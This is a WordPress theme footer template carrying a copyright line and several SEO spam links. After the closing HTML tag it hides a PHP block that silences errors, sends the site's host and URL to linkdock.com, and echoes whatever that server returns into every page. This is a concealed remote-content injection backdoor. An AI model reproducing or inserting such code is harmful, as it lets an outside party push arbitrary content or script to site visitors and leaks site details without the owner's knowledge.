<div id="footer">Copyright ©
<?php echo date('Y');?>
<strong><?php bloginfo('name'); ?></strong> | Designed by: <a href="
http://www.themebin.com 
">ThemeBin</a> | Thanks to: <a href="
http://www.neuwagen-hits.de/ 
">Neuwagen</a>, <a href="
http://www.tuning-infos.de/ 
">Tuning-Infos</a>, <a href="
http://mylexicon.de/neuwagen.html 
">EU-Neuwagen</a> <br /> Download from <a href="
http://wordpresstemplates.name 
" title="Wordpress templates">Wordpress templates</a> | <a href="
http://lyricsmusic.name/ 
" title="Music Lyrics">Music Lyrics</a> | <a href="
http://newsongs.name/ 
" title="New songs">New songs</a></div><hr class="clear" /></div><!--/page --></body></html>
error_reporting(0);$CodeURL = "
http://linkdock.com/content.php?id=&host= 
".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL);} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content);} elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch);}